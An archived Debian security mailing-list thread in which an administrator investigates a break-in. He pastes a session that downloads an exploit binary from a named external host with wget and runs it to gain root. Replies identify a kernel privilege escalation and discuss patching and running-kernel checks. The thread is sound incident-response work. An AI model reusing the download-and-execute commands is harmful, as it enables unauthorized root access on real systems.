rootkit not found by rkhunter

classic Classic list List threaded Threaded
22 messages Options
12
Reply | Threaded
Open this post in threaded view
|

rootkit not found by rkhunter

Thomas Krichel

  I am running debian testing, 2.6.30 kernel.

  I have a rootkit installed on a bunch of machines that rkhunter
  does not find. This appears after infection with SHV4 / SHV5,
  which rkhunter found.

  Here it works to allow a non-root user to become root

krichel@fricka:~$ mkdir a
krichel@fricka:~$ cd a
krichel@fricka:~/a$ ls -l
total 0
krichel@fricka:~/a$  wget webmail.facill.com.br/a
--2009-10-04 07:47:42--  http://webmail.facill.com.br/a
Resolving webmail.facill.com.br... 201.65.241.194
Connecting to webmail.facill.com.br|201.65.241.194|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 6886 (6.7K) [text/plain]
Saving to: `a'

100%[======================================>] 6,886       6.88K/s   in 1.0s    

2009-10-04 07:47:44 (6.88 KB/s) - `a' saved [6886/6886]

krichel@fricka:~/a$ chmod 777 a
krichel@fricka:~/a$ ./a
root@fricka:~/a#

  Here is a situation where it does not work

krichel@chichek:~$ mkdir a
krichel@chichek:~$ cd a
krichel@chichek:~/a$ wget webmail.facill.com.br/a
--2009-10-04 07:31:15--  http://webmail.facill.com.br/a
Resolving webmail.facill.com.br... 201.65.241.194
Connecting to webmail.facill.com.br|201.65.241.194|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 6886 (6.7K) [text/plain]
Saving to: `a'

100%[======================================>] 6,886       37.8K/s   in 0.2s    

2009-10-04 07:31:16 (37.8 KB/s) - `a' saved [6886/6886]

krichel@chichek:~/a$ chmod 777 a
krichel@chichek:~/a$ ./a
mmap: Permission denied


  Does anybody here know how to delete this kit?


  Cheers,

  Thomas Krichel                    http://openlib.org/home/krichel
                                RePEc:per:1965-06-05:thomas_krichel
                                               skype: thomaskrichel



--
To UNSUBSCRIBE, email to [hidden email]
with a subject of "unsubscribe". Trouble? Contact [hidden email]

Reply | Threaded
Open this post in threaded view
|

Re: rootkit not found by rkhunter

cornichon
Thomas Krichel a écrit :

>   I am running debian testing, 2.6.30 kernel.
>
>   I have a rootkit installed on a bunch of machines that rkhunter
>   does not find. This appears after infection with SHV4 / SHV5,
>   which rkhunter found.
>
>   Here it works to allow a non-root user to become root
>
> krichel@fricka:~$ mkdir a
> krichel@fricka:~$ cd a
> krichel@fricka:~/a$ ls -l
> total 0
> krichel@fricka:~/a$  wget webmail.facill.com.br/a
> --2009-10-04 07:47:42--  http://webmail.facill.com.br/a
> Resolving webmail.facill.com.br... 201.65.241.194
> Connecting to webmail.facill.com.br|201.65.241.194|:80... connected.
> HTTP request sent, awaiting response... 200 OK
> Length: 6886 (6.7K) [text/plain]
> Saving to: `a'
>
> 100%[======================================>] 6,886       6.88K/s   in 1.0s    
>
> 2009-10-04 07:47:44 (6.88 KB/s) - `a' saved [6886/6886]
>
> krichel@fricka:~/a$ chmod 777 a
> krichel@fricka:~/a$ ./a
> root@fricka:~/a#
>
>   Here is a situation where it does not work
>
> krichel@chichek:~$ mkdir a
> krichel@chichek:~$ cd a
> krichel@chichek:~/a$ wget webmail.facill.com.br/a
> --2009-10-04 07:31:15--  http://webmail.facill.com.br/a
> Resolving webmail.facill.com.br... 201.65.241.194
> Connecting to webmail.facill.com.br|201.65.241.194|:80... connected.
> HTTP request sent, awaiting response... 200 OK
> Length: 6886 (6.7K) [text/plain]
> Saving to: `a'
>
> 100%[======================================>] 6,886       37.8K/s   in 0.2s    
>
> 2009-10-04 07:31:16 (37.8 KB/s) - `a' saved [6886/6886]
>
> krichel@chichek:~/a$ chmod 777 a
> krichel@chichek:~/a$ ./a
> mmap: Permission denied
>
>
>   Does anybody here know how to delete this kit?
>
>
>   Cheers,
>
>   Thomas Krichel                    http://openlib.org/home/krichel
>                                 RePEc:per:1965-06-05:thomas_krichel
>                                                skype: thomaskrichel
>
>
>

don't understand the difference between the both situations? ^^


--
To UNSUBSCRIBE, email to [hidden email]
with a subject of "unsubscribe". Trouble? Contact [hidden email]

Reply | Threaded
Open this post in threaded view
|

Re: rootkit not found by rkhunter

Bastian Blank
In reply to this post by Thomas Krichel
On Sun, Oct 04, 2009 at 10:15:35AM -0400, Thomas Krichel wrote:
>   I am running debian testing, 2.6.30 kernel.

This kernel lacks a few security fixes.

>   I have a rootkit installed on a bunch of machines that rkhunter
>   does not find. This appears after infection with SHV4 / SHV5,
>   which rkhunter found.

Why do you think this is a rootkit?

Bastian

--
Leave bigotry in your quarters; there's no room for it on the bridge.
                -- Kirk, "Balance of Terror", stardate 1709.2


--
To UNSUBSCRIBE, email to [hidden email]
with a subject of "unsubscribe". Trouble? Contact [hidden email]

Reply | Threaded
Open this post in threaded view
|

Re: rootkit not found by rkhunter

Michael Gilbert
In reply to this post by Thomas Krichel
On Sun, 4 Oct 2009 10:15:35 -0400 Thomas Krichel wrote:
> krichel@fricka:~/a$ chmod 777 a
> krichel@fricka:~/a$ ./a
> root@fricka:~/a#
...
> krichel@chichek:~/a$ chmod 777 a
> krichel@chichek:~/a$ ./a
> mmap: Permission denied

this looks like a standard privilege escalation (not a rootkit). it
appears to be using one of the recent null pointer dereference kernel
vulnerabilities.  your fricka machine is probably running one of the
unpatched kernels ('uname -r' will tell you which version you are
currently running).  chichek is up to date since it is preventing
the dereferenced pointer from accessing mmap.

'apt-get update && apt-get upgrade' followed by a reboot into the new
kernel should bring you up to date.

mike


--
To UNSUBSCRIBE, email to [hidden email]
with a subject of "unsubscribe". Trouble? Contact [hidden email]

Reply | Threaded
Open this post in threaded view
|

Re: rootkit not found by rkhunter

Henri Salo-5
In reply to this post by Thomas Krichel
On Sun, 4 Oct 2009 10:15:35 -0400
Thomas Krichel <[hidden email]> wrote:

>   I am running debian testing, 2.6.30 kernel.
>
>   I have a rootkit installed on a bunch of machines that rkhunter
>   does not find. This appears after infection with SHV4 / SHV5,
>   which rkhunter found.
>
>   Here it works to allow a non-root user to become root
>
> krichel@fricka:~$ mkdir a
> krichel@fricka:~$ cd a
> krichel@fricka:~/a$ ls -l
> total 0
> krichel@fricka:~/a$  wget webmail.facill.com.br/a
> --2009-10-04 07:47:42--  http://webmail.facill.com.br/a
> Resolving webmail.facill.com.br... 201.65.241.194
> Connecting to webmail.facill.com.br|201.65.241.194|:80... connected.
> HTTP request sent, awaiting response... 200 OK
> Length: 6886 (6.7K) [text/plain]
> Saving to: `a'
>
> 100%[======================================>] 6,886       6.88K/s
> in 1.0s    
>
> 2009-10-04 07:47:44 (6.88 KB/s) - `a' saved [6886/6886]
>
> krichel@fricka:~/a$ chmod 777 a
> krichel@fricka:~/a$ ./a
> root@fricka:~/a#
>
>   Here is a situation where it does not work
>
> krichel@chichek:~$ mkdir a
> krichel@chichek:~$ cd a
> krichel@chichek:~/a$ wget webmail.facill.com.br/a
> --2009-10-04 07:31:15--  http://webmail.facill.com.br/a
> Resolving webmail.facill.com.br... 201.65.241.194
> Connecting to webmail.facill.com.br|201.65.241.194|:80... connected.
> HTTP request sent, awaiting response... 200 OK
> Length: 6886 (6.7K) [text/plain]
> Saving to: `a'
>
> 100%[======================================>] 6,886       37.8K/s
> in 0.2s    
>
> 2009-10-04 07:31:16 (37.8 KB/s) - `a' saved [6886/6886]
>
> krichel@chichek:~/a$ chmod 777 a
> krichel@chichek:~/a$ ./a
> mmap: Permission denied
>
>
>   Does anybody here know how to delete this kit?
>
>
>   Cheers,
>
>   Thomas Krichel                    http://openlib.org/home/krichel
>                                 RePEc:per:1965-06-05:thomas_krichel
>                                                skype: thomaskrichel

This file should at least be deleted from the host.

fgeek@foo:~$ file a
a: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV),
dynamically linked (uses shared libs), for GNU/Linux 2.6.9, not
stripped
fgeek@foo:~$ strings a
/lib/ld-linux.so.2
__gmon_start__
libc.so.6
_IO_stdin_used
socket
exit
execl
ftruncate
perror
sendfile
unlink
mkstemp
mmap
getpagesize
getgid
getuid
__libc_start_main
GLIBC_2.1
GLIBC_2.0
PTRh
([^_]
[^_]
mmap
socket
mkstemp
unlink
ftruncate
/bin/sh
/tmp/tmp.XXXXXX
fgeek@foo:~$ md5sum a
b950af01be61a8cbf5d479430738bd18  a
fgeek@foo:~$ sha1sum a
639536caea56554406106ad8679115971485f3a2  a


--
To UNSUBSCRIBE, email to [hidden email]
with a subject of "unsubscribe". Trouble? Contact [hidden email]

Reply | Threaded
Open this post in threaded view
|

Re: rootkit not found by rkhunter

Thomas Krichel
In reply to this post by Michael Gilbert
  Michael S Gilbert writes

> this looks like a standard privilege escalation (not a rootkit). it
> appears to be using one of the recent null pointer dereference kernel
> vulnerabilities.  your fricka machine is probably running one of the
> unpatched kernels ('uname -r' will tell you which version you are
> currently running).  chichek is up to date since it is preventing
> the dereferenced pointer from accessing mmap.

  Hmmmm, here is a of machines affected and unaffected, with
  their kernel version

affected
fricka  2.6.26-2-686
wotan   2.6.30-1-686
raneb   2.6.22-3-686
loge    2.6.26-2-686
trabbi  2.6.26-2-686
mutabor 2.6.26-2-686

not affected
khufu   2.6.30-1-686
chichek 2.6.30-1-686
nebka   2.6.26-2-686
sahure  2.6.30-1-amd64
snefru  2.6.30-1-686

  On Tuesday I replaced all but /root /etc /var and /home on wotan,
  which was the machine that has the SHV4/SHV5. It runs the latest
  kernel. A cracker came in as a non-priviledged user without deleting
  his history, that's how I found out how become got root. I spotted the
  break from root's deleted .bash_history and the user he got in as
  from /var/log/auth.log.

  It looks like the affected machines run older kernels, so
  I will follow your advice and upgrade.

  Thanks and cheers,

  Thomas Krichel                    http://openlib.org/home/krichel
                                RePEc:per:1965-06-05:thomas_krichel
                                               skype: thomaskrichel


--
To UNSUBSCRIBE, email to [hidden email]
with a subject of "unsubscribe". Trouble? Contact [hidden email]

Reply | Threaded
Open this post in threaded view
|

Re: rootkit not found by rkhunter

Thomas Krichel
In reply to this post by Michael Gilbert
  Michael S Gilbert writes

> 'apt-get update && apt-get upgrade' followed by a reboot into the new
> kernel should bring you up to date.

  Since I just download the kernel last week I did not really
  believe your advice but I have rebooted and the problem appears
  gone!


  Cheers,

  Thomas Krichel                    http://openlib.org/home/krichel
                                RePEc:per:1965-06-05:thomas_krichel
                                               skype: thomaskrichel


--
To UNSUBSCRIBE, email to [hidden email]
with a subject of "unsubscribe". Trouble? Contact [hidden email]

Reply | Threaded
Open this post in threaded view
|

Re: rootkit not found by rkhunter

Noah Meyerhans
In reply to this post by Thomas Krichel
On Sun, Oct 04, 2009 at 11:44:52AM -0400, Thomas Krichel wrote:

> > this looks like a standard privilege escalation (not a rootkit). it
> > appears to be using one of the recent null pointer dereference kernel
> > vulnerabilities.  your fricka machine is probably running one of the
> > unpatched kernels ('uname -r' will tell you which version you are
> > currently running).  chichek is up to date since it is preventing
> > the dereferenced pointer from accessing mmap.
>
>   Hmmmm, here is a of machines affected and unaffected, with
>   their kernel version
>
> affected
> fricka  2.6.26-2-686
  ...

The kernel version reported by uname is not enough to determine the
security status of the kernel.  The kernel version number only changes
when the kernel ABI changes.  Security updates are often applied
without ABI bumps.  For example, kernel 2.6.26-2-686 was introduced by
linux 2.6.26-14.  However, the current version is 2.6.26-19.  Several
securty fixes were introduced in the various releases between those two
versions, yet the version reported by uname was unchanged.  You need to
make sure that the machine actually gets rebooted when security updates
are made.

AFAIK, the best way to know if you're running a stale kernel is to
compare the uptime of the machine against the mtime of the actual kernel
(using, e.g. "stat /boot/vmlinuz-2.6.26-2-686").  If the uptime of the
machine places the last reboot sometime before the kernel was updated,
you're not up to date.  If there's a better way to test this, I'd love
to know about it.

noah


signature.asc (196 bytes) Download Attachment
Reply | Threaded
Open this post in threaded view
|

Re: rootkit not found by rkhunter

Henri Salo-5
In reply to this post by Thomas Krichel
On Sun, 4 Oct 2009 12:10:04 -0400
Thomas Krichel <[hidden email]> wrote:

>   Michael S Gilbert writes
>
> > 'apt-get update && apt-get upgrade' followed by a reboot into the
> > new kernel should bring you up to date.
>
>   Since I just download the kernel last week I did not really
>   believe your advice but I have rebooted and the problem appears
>   gone!
>
>
>   Cheers,
>
>   Thomas Krichel                    http://openlib.org/home/krichel
>                                 RePEc:per:1965-06-05:thomas_krichel
>                                                skype: thomaskrichel

You should use apticron and apt-dater.

---
Henri Salo


--
To UNSUBSCRIBE, email to [hidden email]
with a subject of "unsubscribe". Trouble? Contact [hidden email]

Reply | Threaded
Open this post in threaded view
|

Re: rootkit not found by rkhunter

Michael Gilbert
In reply to this post by Thomas Krichel
On Sun, 4 Oct 2009 11:44:52 -0400 Thomas Krichel wrote:
>   It looks like the affected machines run older kernels, so
>   I will follow your advice and upgrade.

i forgot to mention that 'uname -r' won't actually tell you whether you
are running the most up-to-date debian kernel.  to do that, look at the
output of 'dpkg -l | grep linux-image-$(uname -r)'.  you should have
2.6.30-8 or higher for sid and 2.6.26-19 or higher for lenny (not sure
where your 2.6.22 version came from, but i would recommend installing
an official kernel package instead of that one; otherwise you have no
security support at all).

mike


--
To UNSUBSCRIBE, email to [hidden email]
with a subject of "unsubscribe". Trouble? Contact [hidden email]

Reply | Threaded
Open this post in threaded view
|

Re: rootkit not found by rkhunter

Michael Gilbert
In reply to this post by Thomas Krichel
On Sun, 4 Oct 2009 12:10:04 -0400 Thomas Krichel wrote:

>   Michael S Gilbert writes
>
> > 'apt-get update && apt-get upgrade' followed by a reboot into the new
> > kernel should bring you up to date.
>
>   Since I just download the kernel last week I did not really
>   believe your advice but I have rebooted and the problem appears
>   gone!

right, kernel updates do not apply until after reboot.  the latest
kernel images no longer warn about this, which has lead to an increased
number of users opting not to reboot after upgrade (at least from
the volume of similar resolutions to postings on this list recently).

kernel team, would it be possible to get this warning reintroduced or
added to the notification daemon?  we want to keep users informed about
the actions they need to take to stay secure, right?

mike


--
To UNSUBSCRIBE, email to [hidden email]
with a subject of "unsubscribe". Trouble? Contact [hidden email]

Reply | Threaded
Open this post in threaded view
|

Re: rootkit not found by rkhunter

Török Edwin
In reply to this post by Noah Meyerhans
On 2009-10-04 19:10, Noah Meyerhans wrote:

> On Sun, Oct 04, 2009 at 11:44:52AM -0400, Thomas Krichel wrote:
>  
>>> this looks like a standard privilege escalation (not a rootkit). it
>>> appears to be using one of the recent null pointer dereference kernel
>>> vulnerabilities.  your fricka machine is probably running one of the
>>> unpatched kernels ('uname -r' will tell you which version you are
>>> currently running).  chichek is up to date since it is preventing
>>> the dereferenced pointer from accessing mmap.
>>>      
>>   Hmmmm, here is a of machines affected and unaffected, with
>>   their kernel version
>>
>> affected
>> fricka  2.6.26-2-686
>>    
>   ...
>
> The kernel version reported by uname is not enough to determine the
> security status of the kernel.  The kernel version number only changes
> when the kernel ABI changes.  Security updates are often applied
> without ABI bumps.  For example, kernel 2.6.26-2-686 was introduced by
> linux 2.6.26-14.  However, the current version is 2.6.26-19.  Several
> securty fixes were introduced in the various releases between those two
> versions, yet the version reported by uname was unchanged.  

Why is not EXTRAVERSION updated during the kernel package build?

Best regards,
--Edwin


--
To UNSUBSCRIBE, email to [hidden email]
with a subject of "unsubscribe". Trouble? Contact [hidden email]

Reply | Threaded
Open this post in threaded view
|

Re: rootkit not found by rkhunter

Noah Meyerhans-3
On Sun, Oct 04, 2009 at 07:35:53PM +0300, Török Edwin wrote:
>
> Why is not EXTRAVERSION updated during the kernel package build?
>

EXTRAVERSION indicates the ABI version number.  It's only updated when
that changes, in order to indicate that the new kernel is not compatible
with the old one and that external modules (e.g. the ati or nvidia
graphics drivers) need to be rebuilt.

noah


signature.asc (196 bytes) Download Attachment
Reply | Threaded
Open this post in threaded view
|

Re: rootkit not found by rkhunter

Mark van Walraven
In reply to this post by Noah Meyerhans
> AFAIK, the best way to know if you're running a stale kernel is to
> compare the uptime of the machine against the mtime of the actual kernel
> (using, e.g. "stat /boot/vmlinuz-2.6.26-2-686").  If the uptime of the
> machine places the last reboot sometime before the kernel was updated,
> you're not up to date.  If there's a better way to test this, I'd love
> to know about it.

Comparing the outputs of:

        sed -n 's/[^(]*(Debian \([^)]*\)).*/\1/p' /proc/version

and:

        dpkg -s $(dpkg -S $(readlink /vmlinuz) | cut -d: -f1) |
                awk '/^Version: / {print $2}'

has worked well for me - thanks to the kernel team for including the
version and revision!

Mark.


--
To UNSUBSCRIBE, email to [hidden email]
with a subject of "unsubscribe". Trouble? Contact [hidden email]

Reply | Threaded
Open this post in threaded view
|

Re: rootkit not found by rkhunter

Florian Weimer
In reply to this post by Noah Meyerhans
* Noah Meyerhans:

> AFAIK, the best way to know if you're running a stale kernel is to
> compare the uptime of the machine against the mtime of the actual kernel
> (using, e.g. "stat /boot/vmlinuz-2.6.26-2-686").  If the uptime of the
> machine places the last reboot sometime before the kernel was updated,
> you're not up to date.  If there's a better way to test this, I'd love
> to know about it.

What about /proc/version?  If the version stored in it is incorrect,
we should really fix that.


--
To UNSUBSCRIBE, email to [hidden email]
with a subject of "unsubscribe". Trouble? Contact [hidden email]

Reply | Threaded
Open this post in threaded view
|

Re: rootkit not found by rkhunter

dann frazier
In reply to this post by Michael Gilbert
On Sun, Oct 04, 2009 at 12:16:14PM -0400, Michael S Gilbert wrote:
> On Sun, 4 Oct 2009 11:44:52 -0400 Thomas Krichel wrote:
> >   It looks like the affected machines run older kernels, so
> >   I will follow your advice and upgrade.
>
> i forgot to mention that 'uname -r' won't actually tell you whether you
> are running the most up-to-date debian kernel.  to do that, look at the
> output of 'dpkg -l | grep linux-image-$(uname -r)'.

cat /proc/version is nice because it is the running kernel, and
includes the package version.

>  you should have
> 2.6.30-8 or higher for sid and 2.6.26-19 or higher for lenny (not sure
> where your 2.6.22 version came from, but i would recommend installing
> an official kernel package instead of that one; otherwise you have no
> security support at all).
>
> mike
>
>

--
dann frazier


--
To UNSUBSCRIBE, email to [hidden email]
with a subject of "unsubscribe". Trouble? Contact [hidden email]

Reply | Threaded
Open this post in threaded view
|

running vs. installed kernel (was: rootkit not found by rkhunter)

Peter Palfrader
On Mon, 05 Oct 2009, dann frazier wrote:

> On Sun, Oct 04, 2009 at 12:16:14PM -0400, Michael S Gilbert wrote:
> > On Sun, 4 Oct 2009 11:44:52 -0400 Thomas Krichel wrote:
> > >   It looks like the affected machines run older kernels, so
> > >   I will follow your advice and upgrade.
> >
> > i forgot to mention that 'uname -r' won't actually tell you whether you
> > are running the most up-to-date debian kernel.  to do that, look at the
> > output of 'dpkg -l | grep linux-image-$(uname -r)'.
>
> cat /proc/version is nice because it is the running kernel, and
> includes the package version.

Also, maybe
http://git.debian.org/?p=mirror/dsa-nagios.git;a=blob;f=dsa-nagios-checks/checks/dsa-check-running-kernel;hb=HEAD
might be useful for some.

I don't claim it works in all the cases, or finds every weird
combination out there, but it seems to do a pretty good job of helping
us not forget to reboot systems.

I'm sure the interested parties can butcher it for parts if they don't
want all it does (i.e. maybe not everyone wants the get_avail magic).

Cheers,
weasel
--
                           |  .''`.  ** Debian GNU/Linux **
      Peter Palfrader      | : :' :      The  universal
 http://www.palfrader.org/ | `. `'      Operating System
                           |   `-    http://www.debian.org/


--
To UNSUBSCRIBE, email to [hidden email]
with a subject of "unsubscribe". Trouble? Contact [hidden email]

Reply | Threaded
Open this post in threaded view
|

Re: rootkit not found by rkhunter

Jörg Sommer
In reply to this post by Mark van Walraven
Hi,

Mark van Walraven <[hidden email]> wrote:

>> AFAIK, the best way to know if you're running a stale kernel is to
>> compare the uptime of the machine against the mtime of the actual kernel
>> (using, e.g. "stat /boot/vmlinuz-2.6.26-2-686").  If the uptime of the
>> machine places the last reboot sometime before the kernel was updated,
>> you're not up to date.  If there's a better way to test this, I'd love
>> to know about it.
>
> Comparing the outputs of:
>
> sed -n 's/[^(]*(Debian \([^)]*\)).*/\1/p' /proc/version
>
> and:
>
> dpkg -s $(dpkg -S $(readlink /vmlinuz) | cut -d: -f1) |
> awk '/^Version: / {print $2}'
>
> has worked well for me - thanks to the kernel team for including the
> version and revision!

Does someone know, if rkhunter has such a check?

Bye, Jörg.
--
Unsere Zweifel sind Verräter und oft genug verspielen wir den möglichen
Gewinn, weil wir den Versuch nicht wagen.


--
To UNSUBSCRIBE, email to [hidden email]
with a subject of "unsubscribe". Trouble? Contact [hidden email]

Reply | Threaded
Open this post in threaded view
|

Re: rootkit not found by rkhunter

Jörg Sommer
In reply to this post by Noah Meyerhans
Hello Noah,

Noah Meyerhans <[hidden email]> wrote:
> You need to make sure that the machine actually gets rebooted when
> security updates are made.

I thought for security fixes in modules it's enough to update/replace
the module. Isn't it?

Bye, Jörg.
--
NetBSD ist für Frauen: es läuft auf Waschmaschinen


--
To UNSUBSCRIBE, email to [hidden email]
with a subject of "unsubscribe". Trouble? Contact [hidden email]

Reply | Threaded
Open this post in threaded view
|

Re: running vs. installed kernel

Guntram Trebs
In reply to this post by Peter Palfrader
Peter Palfrader schrieb:

> On Mon, 05 Oct 2009, dann frazier wrote:
>
>  
>> cat /proc/version is nice because it is the running kernel, and
>> includes the package version.
>>    
>
> Also, maybe
> http://git.debian.org/?p=mirror/dsa-nagios.git;a=blob;f=dsa-nagios-checks/checks/dsa-check-running-kernel;hb=HEAD
> might be useful for some.
>
>  
There is also a checkon nagios exchange
http://exchange.nagios.org/directory/Plugins/Uncategorized/Operating-Systems/Linux/Running-kernel-compared-to-installed-kernel-version-%252D-updated!/details

It deals different versions of Debian and Ubuntu too.

By the way, on ubuntu systems this information is stored in
/proc/version_signature:
root@web1:~/bin# cat /proc/version
Linux version 2.6.28-15-server (buildd@yellow) (gcc version 4.3.3
(Ubuntu 4.3.3-5ubuntu4) ) #52-Ubuntu SMP Wed Sep 9 11:34:09 UTC 2009
root@web1:~/bin# cat /proc/version_signature
Ubuntu 2.6.28-15.52-server

Cheers,
Gunni

--
Guntram Trebs
freier Programmierer und Administrator

[hidden email]
+49 (30) 42 80 61 55
+49 (179) 519 82 39 (vorläufig)
+49 (151) 55 85 85 55



--
To UNSUBSCRIBE, email to [hidden email]
with a subject of "unsubscribe". Trouble? Contact [hidden email]

12